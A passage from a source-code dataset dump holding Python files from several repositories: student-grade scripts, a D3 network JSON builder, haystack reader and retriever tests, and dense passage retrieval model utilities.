"text": "#!/usr/bin/env python\n\nimport sys\n\n\ndef main():\n students = []\n fp = open(sys.argv[1], \"r\")\n \n for line in list(fp):\n tokens = line.strip().strip('\\'').split(',')\n if tokens[3] == \"\":\n tokens[3] = 0\n student = {\n 'test1': tokens[0].strip('\"'),\n 'test2': tokens[1].strip('\"'),\n 'liceu': tokens[2].strip('\"'),\n 'nume': tokens[3].strip('\"'),\n 'nota': int(tokens[4].strip('\"'))\n }\n students.append(student)\n \n max_grade = -1\n test1 = students[0]['test1']\n test2 = students[0]['test2']\n for s in students:\n if test1 != s['test1']:\n\n print \"Maximul de %s puncte pentru %s,%s: %s, %s\" % (max_grade, max_test1, max_test2, max_student, max_liceu)\n test1 = s['test1']\n max_grade = -1\n if max_grade < s['nota']:\n max_grade = s['nota']\n max_test1 = s['test1']\n max_test2 = s['test2']\n max_liceu = s['liceu']\n max_student = s['nume']\n\n print \"Maximul de %s puncte pentru %s,%s: %s, %s\" % (max_grade, max_test1, max_test2, max_student, max_liceu)\nif __name__ == '__main__':\n sys.exit(main())\n"
},
{
"alpha_fraction": 0.5047720074653625,
"alphanum_fraction": 0.5143160223960876,
"avg_line_length": 20.43181800842285,
"blob_id": "c64d5f4a656ec3fae680fbb2d6b0695546c1e692",
"content_id": "5b2c7bc9d7bf43e2fdd3e3d69b0dc828ffc2ab67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 943,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 44,
"path": "/Python/grades.py",
"repo_name": "alex-mocanu/OSSS",
"src_encoding": "UTF-8",
"text": "#!usr/bin/env python\n\nimport sys\n\n\ndef usage():\n print >> sys.stderr, \"Usage: python %s <filename>\" % (sys.argv[0])\n\n\ndef main():\n if len(sys.argv) != 2:\n usage()\n sys.exit(1)\n\n try:\n fp = open(sys.argv[1], \"r\")\n except IOError, e:\n print >> sys.stderr, \"Argument is not a valid filename\"\n usage()\n sys.exit(1)\n\n text = list(fp)\n line = text[0]\n minim = line.split()[3]\n minim = float(minim)\n maxim = minim\n linemin = line\n linemax = line\n for i in range(1,len(text)):\n line = text[i]\n aux = line.split()[3]\n aux = float(aux)\n if minim > aux:\n minim = aux\n linemin = line\n if maxim < aux:\n maxim = aux\n linemax = line\n\n print \"Nota cea mai mare este obtinuta de: \", linemax,\n print \"Nota cea mai mica este obtinuta de: \", linemin,\n\nif __name__ == \"__main__\":\n sys.exit(main())\n"
}
] | 2 |
neal-o-r/network-D3 | https://github.com/neal-o-r/network-D3 | 14c454909af4c1e8174c52b882c7256e2ec5405a | 71349d3755f2af1e4fdb6d8dce3be46d33330154 | 7c8091f058b1832c01d5e466ef518c3ef5eb42e8 | refs/heads/master | 2020-04-08T19:46:07.435703 | 2018-11-29T13:26:18 | 2018-11-29T13:26:18 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4971509873867035,
"alphanum_fraction": 0.5128205418586731,
"avg_line_length": 20.9375,
"blob_id": "7be0b6aaf5eb8dd4f38153f8628333f2a450c267",
"content_id": "5e70f3db97fb8447783249daede8aa407da1b1a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 702,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 32,
"path": "/make_network.py",
"repo_name": "neal-o-r/network-D3",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport json\n\ndef make_network_json(df, n=100):\n \"\"\"\n takes in a df and a number of links,\n saves a json of nodes and connections to n\n \"\"\"\n col = '#000'\n top = df.sort_values(by='Frequency').tail(n)\n\n ns = {*top.K1} | {*top.K2}\n\n nodes = [{'colour':col,\n 'name':n,\n 'id': n} for n in ns]\n\n links = [{'source': t.K1,\n 'target': t.K2,\n 'value' : t.Frequency} for i, t in top.iterrows()]\n\n json.dump({'nodes':nodes, 'links':links}, open('network.json', 'w'),\n indent=4)\n\n return nodes, links\n\n\n\nif __name__ == '__main__':\n\n df = pd.read_csv('data.csv')\n n, l = make_network_json(df)\n"
},
{
"alpha_fraction": 0.6875,
"alphanum_fraction": 0.7291666865348816,
"avg_line_length": 14.666666984558105,
"blob_id": "4ea37bb03f84e479466761e8c2f09a81c3d37529",
"content_id": "9c0ff2a0b78bd806993726c122f8cd33f71c4a64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 3,
"path": "/README.md",
"repo_name": "neal-o-r/network-D3",
"src_encoding": "UTF-8",
"text": "# D3 Network\n\nMWE of a D3 force directed graph \n"
}
] | 2 |
antoniolanza1996/haystack | https://github.com/antoniolanza1996/haystack | aa524cbbba3db1d56d4cc863cfce7ef18b483e5e | 074107fab98e41f569ffd8bc1b310769bbdfef75 | ff0db928b5ae956c36cde628b4c1e60e210173a4 | refs/heads/master | 2023-02-12T19:54:03.084578 | 2020-11-15T10:50:14 | 2020-11-15T10:50:14 | 292,628,288 | 1 | 1 | Apache-2.0 | 2020-09-03T16:52:36 | 2020-09-03T16:43:04 | 2020-09-03T10:37:25 | null | [
{
"alpha_fraction": 0.6730896830558777,
"alphanum_fraction": 0.6859357953071594,
"avg_line_length": 48.58241653442383,
"blob_id": "67c7b50fbc104138c5dffd609e503bfe89536b8f",
"content_id": "26054ed93545c5b38161a496a2a17a4b0aca4e2b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4515,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 91,
"path": "/test/test_reader.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "import math\n\nfrom haystack.database.base import Document\nfrom haystack.reader.base import BaseReader\nfrom haystack.reader.farm import FARMReader\nfrom haystack.reader.transformers import TransformersReader\n\n\n\ndef test_reader_basic(reader):\n assert reader is not None\n assert isinstance(reader, BaseReader)\n\n\ndef test_output(prediction):\n assert prediction is not None\n assert prediction[\"question\"] == \"Who lives in Berlin?\"\n assert prediction[\"answers\"][0][\"answer\"] == \"Carla\"\n assert prediction[\"answers\"][0][\"offset_start\"] == 11\n assert prediction[\"answers\"][0][\"offset_end\"] == 16\n assert prediction[\"answers\"][0][\"probability\"] <= 1\n assert prediction[\"answers\"][0][\"probability\"] >= 0\n assert prediction[\"answers\"][0][\"context\"] == \"My name is Carla and I live in Berlin\"\n assert len(prediction[\"answers\"]) == 5\n\n\ndef test_no_answer_output(no_answer_prediction):\n assert no_answer_prediction is not None\n assert no_answer_prediction[\"question\"] == \"What is the meaning of life?\"\n assert math.isclose(no_answer_prediction[\"no_ans_gap\"], -14.4729533, rel_tol=0.0001)\n assert no_answer_prediction[\"answers\"][0][\"answer\"] is None\n assert no_answer_prediction[\"answers\"][0][\"offset_start\"] == 0\n assert no_answer_prediction[\"answers\"][0][\"offset_end\"] == 0\n assert no_answer_prediction[\"answers\"][0][\"probability\"] <= 1\n assert no_answer_prediction[\"answers\"][0][\"probability\"] >= 0\n assert no_answer_prediction[\"answers\"][0][\"context\"] == None\n assert no_answer_prediction[\"answers\"][0][\"document_id\"] == None\n answers = [x[\"answer\"] for x in no_answer_prediction[\"answers\"]]\n assert answers.count(None) == 1\n assert len(no_answer_prediction[\"answers\"]) == 5\n\n# TODO Directly compare farm and transformers reader outputs\n# TODO checks to see that model is responsive to input arguments e.g. context_window_size - topk\n\ndef test_prediction_attributes(prediction):\n # TODO FARM's prediction also has no_ans_gap\n attributes_gold = [\"question\", \"answers\"]\n for ag in attributes_gold:\n assert ag in prediction\n\n\ndef test_answer_attributes(prediction):\n # TODO Transformers answer also has meta key\n # TODO FARM answer has offset_start_in_doc, offset_end_in_doc\n answer = prediction[\"answers\"][0]\n attributes_gold = ['answer', 'score', 'probability', 'context', 'offset_start', 'offset_end', 'document_id']\n for ag in attributes_gold:\n assert ag in answer\n\n\ndef test_context_window_size(test_docs_xs):\n # TODO parametrize window_size and farm/transformers reader using pytest\n docs = [Document.from_dict(d) if isinstance(d, dict) else d for d in test_docs_xs]\n for window_size in [10, 15, 20]:\n farm_reader = FARMReader(model_name_or_path=\"distilbert-base-uncased-distilled-squad\", num_processes=0,\n use_gpu=False, top_k_per_sample=5, no_ans_boost=None, context_window_size=window_size)\n prediction = farm_reader.predict(question=\"Who lives in Berlin?\", documents=docs, top_k=5)\n for answer in prediction[\"answers\"]:\n # If the extracted answer is larger than the context window, the context window is expanded.\n # If the extracted answer is odd in length, the resulting context window is one less than context_window_size\n # due to rounding (See FARM's QACandidate)\n # TODO Currently the behaviour of context_window_size in FARMReader and TransformerReader is different\n if len(answer[\"answer\"]) <= window_size:\n assert len(answer[\"context\"]) in [window_size, window_size-1]\n else:\n assert len(answer[\"answer\"]) == len(answer[\"context\"])\n\n # TODO Need to test transformers reader\n # TODO Currently the behaviour of context_window_size in FARMReader and TransformerReader is different\n\n\ndef test_top_k(test_docs_xs):\n # TODO parametrize top_k and farm/transformers reader using pytest\n # TODO transformers reader was crashing when tested on this\n\n docs = [Document.from_dict(d) if isinstance(d, dict) else d for d in test_docs_xs]\n farm_reader = FARMReader(model_name_or_path=\"distilbert-base-uncased-distilled-squad\", num_processes=0,\n use_gpu=False, top_k_per_sample=4, no_ans_boost=None, top_k_per_candidate=4)\n for top_k in [2, 5, 10]:\n prediction = farm_reader.predict(question=\"Who lives in Berlin?\", documents=docs, top_k=top_k)\n assert len(prediction[\"answers\"]) == top_k\n\n\n\n"
},
{
"alpha_fraction": 0.685352623462677,
"alphanum_fraction": 0.7016274929046631,
"avg_line_length": 47.043479919433594,
"blob_id": "f90ab5023448bc2174dab6ec302a2ec2b8079a2d",
"content_id": "f469aa69ff2f967ed2e48a610ba28a6c6b21f024",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1106,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 23,
"path": "/test/test_dummy_retriever.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "from haystack.database.base import Document\nimport pytest\n\n\[email protected](\"document_store_with_docs\", [(\"elasticsearch\")], indirect=True)\ndef test_dummy_retriever(document_store_with_docs):\n from haystack.retriever.sparse import ElasticsearchFilterOnlyRetriever\n retriever = ElasticsearchFilterOnlyRetriever(document_store_with_docs)\n\n result = retriever.retrieve(query=\"godzilla\", filters={\"name\": [\"filename1\"]}, top_k=1)\n assert type(result[0]) == Document\n assert result[0].text == \"My name is Carla and I live in Berlin\"\n assert result[0].meta[\"name\"] == \"filename1\"\n\n result = retriever.retrieve(query=\"godzilla\", filters={\"name\": [\"filename1\"]}, top_k=5)\n assert type(result[0]) == Document\n assert result[0].text == \"My name is Carla and I live in Berlin\"\n assert result[0].meta[\"name\"] == \"filename1\"\n\n result = retriever.retrieve(query=\"godzilla\", filters={\"name\": [\"filename3\"]}, top_k=5)\n assert type(result[0]) == Document\n assert result[0].text == \"My name is Christelle and I live in Paris\"\n assert result[0].meta[\"name\"] == \"filename3\"\n\n"
},
{
"alpha_fraction": 0.6672862768173218,
"alphanum_fraction": 0.6701708436012268,
"avg_line_length": 41.977962493896484,
"blob_id": "75850c66e15cd906c63f487dbe794d517ab2d391",
"content_id": "dabfdcc2f827f5993d8fa1828e448f473e2c4a44",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 31201,
"license_type": "permissive",
"max_line_length": 256,
"num_lines": 726,
"path": "/haystack/retriever/dpr_utils.py",
"repo_name": "antoniolanza1996/haystack",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# Utilility functions and classes required for DensePassageRetriever\n#\n# Building upon the code (https://github.com/facebookresearch/DPR) published by Facebook research under Creative Commons License (https://github.com/facebookresearch/DPR/blob/master/LICENSE)\n# It is based on the following research work:\n# Karpukhin, Vladimir, et al. \"Dense Passage Retrieval for Open-Domain Question Answering.\" arXiv preprint arXiv:2004.04906 (2020).\n# (https://arxiv.org/abs/2004.04906)\n\nimport logging\nfrom typing import Tuple, Union, List\n\nimport gzip\nimport re\n\nimport torch\nfrom torch import nn, Tensor\n\nfrom transformers.modeling_bert import BertModel, BertConfig\nfrom transformers.file_utils import add_start_docstrings_to_callable\nfrom transformers.modeling_utils import PreTrainedModel\nfrom transformers.file_utils import add_start_docstrings\nfrom transformers.tokenization_bert import BertTokenizer, BertTokenizerFast\n\nimport logging\nfrom dataclasses import dataclass\nfrom typing import Optional, Tuple, Union\n\n\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n_CONFIG_FOR_DOC = \"DPRConfig\"\n\nDPR_CONTEXT_ENCODER_PRETRAINED_MODEL_ARCHIVE_LIST = [\n \"facebook/dpr-ctx_encoder-single-nq-base\",\n]\nDPR_QUESTION_ENCODER_PRETRAINED_MODEL_ARCHIVE_LIST = [\n \"facebook/dpr-question_encoder-single-nq-base\",\n]\nDPR_READER_PRETRAINED_MODEL_ARCHIVE_LIST = [\n \"facebook/dpr-reader-single-nq-base\",\n]\n# CLASSES\n############\n# file_utils\n############\n\nclass ModelOutput:\n \"\"\"\n Base class for all model outputs as dataclass. Has a ``__getitem__`` that allows indexing by integer or slice (like\n a tuple) or strings (like a dictionnary) that will ignore the ``None`` attributes.\n \"\"\"\n\n def to_tuple(self):\n \"\"\"\n Converts :obj:`self` to a tuple.\n\n Return: A tuple containing all non-:obj:`None` attributes of the :obj:`self`.\n \"\"\"\n return tuple(getattr(self, f) for f in self.__dataclass_fields__.keys() if getattr(self, f, None) is not None)\n\n def to_dict(self):\n \"\"\"\n Converts :obj:`self` to a Python dictionary.\n\n Return: A dictionary containing all non-:obj:`None` attributes of the :obj:`self`.\n \"\"\"\n return {f: getattr(self, f) for f in self.__dataclass_fields__.keys() if getattr(self, f, None) is not None}\n\n def __getitem__(self, i):\n return self.to_dict()[i] if isinstance(i, str) else self.to_tuple()[i]\n\n def __len__(self):\n return len(self.to_tuple())\n\nRETURN_INTRODUCTION = r\"\"\"\n Returns:\n :class:`~{full_output_type}` or :obj:`tuple(torch.FloatTensor)` (if ``return_tuple=True`` is passed or when ``config.return_tuple=True``) comprising various elements depending on the configuration (:class:`~transformers.{config_class}`) and inputs:\n\"\"\"\n\ndef _prepare_output_docstrings(output_type, config_class):\n \"\"\"\n Prepares the return part of the docstring using `output_type`.\n \"\"\"\n docstrings = output_type.__doc__\n\n # Remove the head of the docstring to keep the list of args only\n lines = docstrings.split(\"\\n\")\n i = 0\n while i < len(lines) and re.search(r\"^\\s*(Args|Parameters):\\s*$\", lines[i]) is None:\n i += 1\n if i < len(lines):\n docstrings = \"\\n\".join(lines[(i + 1) :])\n\n # Add the return introduction\n full_output_type = f\"{output_type.__module__}.{output_type.__name__}\"\n intro = RETURN_INTRODUCTION.format(full_output_type=full_output_type, config_class=config_class)\n return intro + docstrings\n\ndef replace_return_docstrings(output_type=None, config_class=None):\n def docstring_decorator(fn):\n docstrings = fn.__doc__\n lines = docstrings.split(\"\\n\")\n i = 0\n while i < len(lines) and re.search(r\"^\\s*Returns?:\\s*$\", lines[i]) is None:\n i += 1\n if i < len(lines):\n lines[i] = _prepare_output_docstrings(output_type, config_class)\n docstrings = \"\\n\".join(lines)\n else:\n raise ValueError(\n f\"The function {fn} should have an empty 'Return:' or 'Returns:' in its docstring as placeholder, current docstring is:\\n{docstrings}\"\n )\n fn.__doc__ = docstrings\n return fn\n\n return docstring_decorator\n\n###########\n# modeling_outputs\n###########\n@dataclass\nclass BaseModelOutputWithPooling(ModelOutput):\n \"\"\"\n Base class for model's outputs that also contains a pooling of the last hidden states.\n\n Args:\n last_hidden_state (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`):\n Sequence of hidden-states at the output of the last layer of the model.\n pooler_output (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, hidden_size)`):\n Last layer hidden-state of the first token of the sequence (classification token)\n further processed by a Linear layer and a Tanh activation function. The Linear\n layer weights are trained from the next sentence prediction (classification)\n objective during pretraining.\n\n This output is usually *not* a good summary\n of the semantic content of the input, you're often better with averaging or pooling\n the sequence of hidden-states for the whole input sequence.\n hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):\n Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)\n of shape :obj:`(batch_size, sequence_length, hidden_size)`.\n\n Hidden-states of the model at the output of each layer plus the initial embedding outputs.\n attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):\n Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape\n :obj:`(batch_size, num_heads, sequence_length, sequence_length)`.\n\n Attentions weights after the attention softmax, used to compute the weighted average in the self-attention\n heads.\n \"\"\"\n\n last_hidden_state: torch.FloatTensor\n pooler_output: torch.FloatTensor\n hidden_states: Optional[Tuple[torch.FloatTensor]] = None\n attentions: Optional[Tuple[torch.FloatTensor]] = None\n\n\n###########\n#tokenization_dpr\n###########\n\nVOCAB_FILES_NAMES = {\"vocab_file\": \"vocab.txt\"}\n\nCONTEXT_ENCODER_PRETRAINED_VOCAB_FILES_MAP = {\n \"vocab_file\": {\n \"facebook/dpr-ctx_encoder-single-nq-base\": \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased-vocab.txt\",\n }\n}\nQUESTION_ENCODER_PRETRAINED_VOCAB_FILES_MAP = {\n \"vocab_file\": {\n \"facebook/dpr-question_encoder-single-nq-base\": \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased-vocab.txt\",\n }\n}\nREADER_PRETRAINED_VOCAB_FILES_MAP = {\n \"vocab_file\": {\n \"facebook/dpr-reader-single-nq-base\": \"https://s3.amazonaws.com/models.huggingface.co/bert/bert-base-uncased-vocab.txt\",\n }\n}\n\nCONTEXT_ENCODER_PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {\n \"facebook/dpr-ctx_encoder-single-nq-base\": 512,\n}\nQUESTION_ENCODER_PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {\n \"facebook/dpr-question_encoder-single-nq-base\": 512,\n}\nREADER_PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {\n \"facebook/dpr-reader-single-nq-base\": 512,\n}\n\n\nCONTEXT_ENCODER_PRETRAINED_INIT_CONFIGURATION = {\n \"facebook/dpr-ctx_encoder-single-nq-base\": {\"do_lower_case\": True},\n}\nQUESTION_ENCODER_PRETRAINED_INIT_CONFIGURATION = {\n \"facebook/dpr-question_encoder-single-nq-base\": {\"do_lower_case\": True},\n}\nREADER_PRETRAINED_INIT_CONFIGURATION = {\n \"facebook/dpr-reader-single-nq-base\": {\"do_lower_case\": True},\n}\n\n\nclass DPRContextEncoderTokenizer(BertTokenizer):\n r\"\"\"\n Constructs a DPRContextEncoderTokenizer.\n\n :class:`~transformers.DPRContextEncoderTokenizer` is identical to :class:`~transformers.BertTokenizer` and runs end-to-end\n tokenization: punctuation splitting + wordpiece.\n\n Refer to superclass :class:`~transformers.BertTokenizer` for usage examples and documentation concerning\n parameters.\n \"\"\"\n\n vocab_files_names = VOCAB_FILES_NAMES\n pretrained_vocab_files_map = CONTEXT_ENCODER_PRETRAINED_VOCAB_FILES_MAP\n max_model_input_sizes = CONTEXT_ENCODER_PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES\n pretrained_init_configuration = CONTEXT_ENCODER_PRETRAINED_INIT_CONFIGURATION\n\n\nclass DPRContextEncoderTokenizerFast(BertTokenizerFast):\n r\"\"\"\n Constructs a \"Fast\" DPRContextEncoderTokenizer (backed by HuggingFace's `tokenizers` library).\n\n :class:`~transformers.DPRContextEncoderTokenizerFast` is identical to :class:`~transformers.BertTokenizerFast` and runs end-to-end\n tokenization: punctuation splitting + wordpiece.\n\n Refer to superclass :class:`~transformers.BertTokenizerFast` for usage examples and documentation concerning\n parameters.\n \"\"\"\n\n vocab_files_names = VOCAB_FILES_NAMES\n pretrained_vocab_files_map = CONTEXT_ENCODER_PRETRAINED_VOCAB_FILES_MAP\n max_model_input_sizes = CONTEXT_ENCODER_PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES\n pretrained_init_configuration = CONTEXT_ENCODER_PRETRAINED_INIT_CONFIGURATION\n\n\nclass DPRQuestionEncoderTokenizer(BertTokenizer):\n r\"\"\"\n Constructs a DPRQuestionEncoderTokenizer.\n\n :class:`~transformers.DPRQuestionEncoderTokenizer` is identical to :class:`~transformers.BertTokenizer` and runs end-to-end\n tokenization: punctuation splitting + wordpiece.\n\n Refer to superclass :class:`~transformers.BertTokenizer` for usage examples and documentation concerning\n parameters.\n \"\"\"\n\n vocab_files_names = VOCAB_FILES_NAMES\n pretrained_vocab_files_map = QUESTION_ENCODER_PRETRAINED_VOCAB_FILES_MAP\n max_model_input_sizes = QUESTION_ENCODER_PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES\n pretrained_init_configuration = QUESTION_ENCODER_PRETRAINED_INIT_CONFIGURATION\n\n\nclass DPRQuestionEncoderTokenizerFast(BertTokenizerFast):\n r\"\"\"\n Constructs a \"Fast\" DPRQuestionEncoderTokenizer (backed by HuggingFace's `tokenizers` library).\n\n :class:`~transformers.DPRQuestionEncoderTokenizerFast` is identical to :class:`~transformers.BertTokenizerFast` and runs end-to-end\n tokenization: punctuation splitting + wordpiece.\n\n Refer to superclass :class:`~transformers.BertTokenizerFast` for usage examples and documentation concerning\n parameters.\n \"\"\"\n\n vocab_files_names = VOCAB_FILES_NAMES\n pretrained_vocab_files_map = QUESTION_ENCODER_PRETRAINED_VOCAB_FILES_MAP\n max_model_input_sizes = QUESTION_ENCODER_PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES\n pretrained_init_configuration = QUESTION_ENCODER_PRETRAINED_INIT_CONFIGURATION\n\n\n\n\n##########\n# configuration_dpr\n##########\n\n\nDPR_PRETRAINED_CONFIG_ARCHIVE_MAP = {\n \"facebook/dpr-ctx_encoder-single-nq-base\": \"https://s3.amazonaws.com/models.huggingface.co/bert/facebook/dpr-ctx_encoder-single-nq-base/config.json\",\n \"facebook/dpr-question_encoder-single-nq-base\": \"https://s3.amazonaws.com/models.huggingface.co/bert/facebook/dpr-question_encoder-single-nq-base/config.json\",\n \"facebook/dpr-reader-single-nq-base\": \"https://s3.amazonaws.com/models.huggingface.co/bert/facebook/dpr-reader-single-nq-base/config.json\",\n}\n\n\nclass DPRConfig(BertConfig):\n r\"\"\"\n :class:`~transformers.DPRConfig` is the configuration class to store the configuration of a\n `DPRModel`.\n\n This is the configuration class to store the configuration of a `DPRContextEncoder`, `DPRQuestionEncoder`, or a `DPRReader`.\n It is used to instantiate the components of the DPR model.\n\n Args:\n projection_dim (:obj:`int`, optional, defaults to 0):\n Dimension of the projection for the context and question encoders.\n If it is set to zero (default), then no projection is done.\n \"\"\"\n model_type = \"dpr\"\n\n def __init__(self, projection_dim: int = 0, **kwargs): # projection of the encoders, 0 for no projection\n super().__init__(**kwargs)\n self.projection_dim = projection_dim\n\n##########\n# Outputs\n##########\n\n\n@dataclass\nclass DPRContextEncoderOutput(ModelOutput):\n \"\"\"\n Class for outputs of :class:`~transformers.DPRQuestionEncoder`.\n\n Args:\n pooler_output: (:obj:``torch.FloatTensor`` of shape ``(batch_size, embeddings_size)``):\n The DPR encoder outputs the `pooler_output` that corresponds to the context representation.\n Last layer hidden-state of the first token of the sequence (classification token)\n further processed by a Linear layer. This output is to be used to embed contexts for\n nearest neighbors queries with questions embeddings.\n hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):\n Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)\n of shape :obj:`(batch_size, sequence_length, hidden_size)`.\n\n Hidden-states of the model at the output of each layer plus the initial embedding outputs.\n attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):\n Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape\n :obj:`(batch_size, num_heads, sequence_length, sequence_length)`.\n\n Attentions weights after the attention softmax, used to compute the weighted average in the self-attention\n heads.\n \"\"\"\n\n pooler_output: torch.FloatTensor\n hidden_states: Optional[Tuple[torch.FloatTensor]] = None\n attentions: Optional[Tuple[torch.FloatTensor]] = None\n\n@dataclass\nclass DPRQuestionEncoderOutput(ModelOutput):\n \"\"\"\n Class for outputs of :class:`~transformers.DPRQuestionEncoder`.\n\n Args:\n pooler_output: (:obj:``torch.FloatTensor`` of shape ``(batch_size, embeddings_size)``):\n The DPR encoder outputs the `pooler_output` that corresponds to the question representation.\n Last layer hidden-state of the first token of the sequence (classification token)\n further processed by a Linear layer. This output is to be used to embed questions for\n nearest neighbors queries with context embeddings.\n hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):\n Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)\n of shape :obj:`(batch_size, sequence_length, hidden_size)`.\n\n Hidden-states of the model at the output of each layer plus the initial embedding outputs.\n attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):\n Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape\n :obj:`(batch_size, num_heads, sequence_length, sequence_length)`.\n\n Attentions weights after the attention softmax, used to compute the weighted average in the self-attention\n heads.\n \"\"\"\n\n pooler_output: torch.FloatTensor\n hidden_states: Optional[Tuple[torch.FloatTensor]] = None\n attentions: Optional[Tuple[torch.FloatTensor]] = None\n\n\n@dataclass\nclass DPRReaderOutput(ModelOutput):\n \"\"\"\n Class for outputs of :class:`~transformers.DPRQuestionEncoder`.\n\n Args:\n start_logits: (:obj:``torch.FloatTensor`` of shape ``(n_passages, sequence_length)``):\n Logits of the start index of the span for each passage.\n end_logits: (:obj:``torch.FloatTensor`` of shape ``(n_passages, sequence_length)``):\n Logits of the end index of the span for each passage.\n relevance_logits: (:obj:`torch.FloatTensor`` of shape ``(n_passages, )``):\n Outputs of the QA classifier of the DPRReader that corresponds to the scores of each passage\n to answer the question, compared to all the other passages.\n hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):\n Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)\n of shape :obj:`(batch_size, sequence_length, hidden_size)`.\n\n Hidden-states of the model at the output of each layer plus the initial embedding outputs.\n attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):\n Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape\n :obj:`(batch_size, num_heads, sequence_length, sequence_length)`.\n\n Attentions weights after the attention softmax, used to compute the weighted average in the self-attention\n heads.\n \"\"\"\n\n start_logits: torch.FloatTensor\n end_logits: torch.FloatTensor\n relevance_logits: torch.FloatTensor\n hidden_states: Optional[Tuple[torch.FloatTensor]] = None\n attentions: Optional[Tuple[torch.FloatTensor]] = None\n\n##################\n# PreTrainedModel\n##################\n\nclass DPREncoder(PreTrainedModel):\n\n base_model_prefix = \"bert_model\"\n\n def __init__(self, config: DPRConfig):\n super().__init__(config)\n self.bert_model = BertModel(config)\n assert self.bert_model.config.hidden_size > 0, \"Encoder hidden_size can't be zero\"\n self.projection_dim = config.projection_dim\n if self.projection_dim > 0:\n self.encode_proj = nn.Linear(self.bert_model.config.hidden_size, config.projection_dim)\n self.init_weights()\n\n def forward(\n self,\n input_ids: Tensor,\n attention_mask: Optional[Tensor] = None,\n token_type_ids: Optional[Tensor] = None,\n inputs_embeds: Optional[Tensor] = None,\n output_attentions: bool = False,\n output_hidden_states: bool = False,\n return_tuple: bool = True,\n ) -> Union[BaseModelOutputWithPooling, Tuple[Tensor, ...]]:\n outputs = self.bert_model(\n input_ids=input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n inputs_embeds=inputs_embeds,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n )\n sequence_output, pooled_output = outputs[:2]\n pooled_output = sequence_output[:, 0, :]\n if self.projection_dim > 0:\n pooled_output = self.encode_proj(pooled_output)\n\n if return_tuple:\n return (sequence_output, pooled_output) + outputs[2:]\n\n return BaseModelOutputWithPooling(\n last_hidden_state=sequence_output,\n pooler_output=pooled_output,\n hidden_states=outputs.hidden_states,\n attentions=outputs.attentions,\n )\n\n @property\n def embeddings_size(self) -> int:\n if self.projection_dim > 0:\n return self.encode_proj.out_features\n return self.bert_model.config.hidden_size\n\n def init_weights(self):\n self.bert_model.init_weights()\n if self.projection_dim > 0:\n self.encode_proj.apply(self.bert_model._init_weights)\n\n\nclass DPRPretrainedContextEncoder(PreTrainedModel):\n \"\"\" An abstract class to handle weights initialization and\n a simple interface for downloading and loading pretrained models.\n \"\"\"\n\n config_class = DPRConfig\n load_tf_weights = None\n base_model_prefix = \"ctx_encoder\"\n\n def init_weights(self):\n self.ctx_encoder.init_weights()\n\n\nclass DPRPretrainedQuestionEncoder(PreTrainedModel):\n \"\"\" An abstract class to handle weights initialization and\n a simple interface for downloading and loading pretrained models.\n \"\"\"\n\n config_class = DPRConfig\n load_tf_weights = None\n base_model_prefix = \"question_encoder\"\n\n def init_weights(self):\n self.question_encoder.init_weights()\n\n\nDPR_START_DOCSTRING = r\"\"\"\n\n This model is a PyTorch `torch.nn.Module <https://pytorch.org/docs/stable/nn.html#torch.nn.Module>`_ sub-class.\n Use it as a regular PyTorch Module and refer to the 